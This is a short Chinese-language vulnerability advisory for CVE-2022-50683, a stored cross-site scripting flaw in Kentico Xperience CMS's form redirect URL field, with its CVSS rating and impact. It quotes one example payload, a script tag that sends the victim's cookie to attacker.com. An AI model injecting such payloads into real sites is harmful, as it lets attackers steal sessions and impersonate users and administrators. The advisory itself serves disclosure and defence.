CVE-2022-50683CVE-2022-50683是Kentico Xperience CMS系统中存在的存储型跨站脚本(Stored XSS)漏洞,CVSS评分5.4,中危级别。该漏洞允许具有低权限的攻击者通过表单重定向URL配置功能注入恶意JavaScript脚本。当其他用户访问受影响页面时,恶意脚本会在其浏览器中执行,可能导致会话劫持、敏感信息窃取或进一步的钓鱼攻击。此漏洞无需高权限即可利用,但需要用户交互触发。攻击者可利用此漏洞窃取管理员cookie、冒充合法用户执行操作或植入恶意内容。由于是存储型XSS,恶意脚本会持久存在于系统中,影响所有访问相关页面的用户。
漏洞存在于Kentico Xperience的表单配置模块中,具体位置是表单重定向URL设置功能。系统在处理重定向URL参数时未对用户输入进行充分的HTML实体编码或输入验证。攻击者可以在表单的重定向URL字段中插入恶意JavaScript代码,如:<script>document.location='https://attacker.com/steal?c='+document.cookie</script>。由于该配置被存储在数据库中且在页面渲染时未经过滤直接输出,导致所有访问该表单相关页面的用户都会执行这段恶意代码。攻击者需要至少具有表单配置的低权限(PR:L),并诱骗管理员或普通用户访问包含恶意脚本的页面(UI:R)。攻击向量为网络层面(AV:N),可影响系统的机密性和完整性(C:L/I:L),但不影响可用性(A:N)。